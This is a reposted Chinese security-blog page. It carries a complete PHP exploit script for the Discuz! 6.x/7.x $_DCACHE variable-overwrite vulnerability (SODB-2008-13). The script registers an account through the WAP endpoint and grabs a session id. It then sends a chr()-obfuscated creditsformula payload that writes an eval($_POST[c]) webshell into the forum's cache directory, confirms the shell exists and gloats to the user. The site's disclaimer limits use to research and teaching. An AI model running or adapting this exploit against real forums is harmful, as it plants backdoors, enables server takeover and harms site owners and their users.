Discuz! 6.x/7.x SODB-2008-13 Exp 's

admin 2017年5月1日08:13:02评论281 views字数 1917阅读6分23秒阅读模式
摘要

# 鬼仔:SODB-2008-13 Discuz! $_DCACHE数组变量覆盖漏洞

# 鬼仔:SODB-2008-13 Discuz! $_DCACHE数组变量覆盖漏洞

#!/usr/bin/php <?php /** * Discuz! 6.x/7.x SODB-2008-13 Exp * By www.80vul.com * 文件中注释的变量值请自行修改 */ $host = 'www.80vul.com'; // 服务器域名或IP $path = '/discuz/'; // 程序所在的路径 $key  = 0; // 上面的变量编辑好后,请将此处的值改为1  if (strpos($host, '://') !== false || strpos($path, '/') === false || $key !== 1) exit("专业点好不,先看看里面的注释 -,-/n");  error_reporting(7); ini_set('max_execution_time', 0);  $key = time(); $cmd = 'action=register&username='.$key.'&password='.$key.'&[email protected]&_DCACHE=1'; $resp = send();  preg_match('/logout=yes&amp;formhash=[a-z0-9]{8}&amp;sid=([a-zA-Z0-9]{6})/', $resp, $sid);  if (!$sid) exit("哦,大概是没有开启WAP注册吧 -,-/n");  $cmd = 'stylejump[1]=1&styleid=1&inajax=1&transsidstatus=1&sid='.$sid[1].'&creditsformula=${${fputs(fopen(chr(46).chr(46).chr(47).chr(102).chr(111).chr(114).chr(117).chr(109).chr(100).chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(101).chr(118).chr(97).chr(108).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(93).chr(41).chr(63).chr(62).chr(56).chr(48).chr(118).chr(117).chr(108))}}'; send();  $shell = 'http://'.$host.$path.'forumdata/cache/eval.php';  if (file_get_contents($shell) == '80vul') exit("好了,去看看你的WebShell吧:/t$shell/n里面的代码是:/t<?eval(/$_POST[c])?>/n别告诉我你不会用 -,-/n"); else exit("嗯,大概是该网站不存在漏洞,换一个吧 -,-/n");  function send() { global $host, $path, $url, $cmd;  $data = "POST ".$path."wap/index.php  HTTP/1.1/r/n"; $data .= "Accept: */*/r/n"; $data .= "Accept-Language: zh-cn/r/n"; $data .= "Referer: http://$host$path/r/n"; $data .= "Content-Type: application/x-www-form-urlencoded/r/n"; $data .= "User-Agent: Opera/9.62 (X11; Linux i686; U; zh-cn) Presto/2.1.1/r/n"; $data .= "Host: $host/r/n"; $data .= "Connection: Close/r/n"; $data .= "Content-Length: ".strlen($cmd)."/r/n/r/n"; $data .= $cmd;  $fp = fsockopen($host, 80); fputs($fp, $data);  $resp = '';  while ($fp && !feof($fp)) $resp .= fread($fp, 1024);  return $resp; }  ?>

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2017年5月1日08:13:02
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Discuz! 6.x/7.x SODB-2008-13 Exp 'shttps://cn-sec.com/archives/45797.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息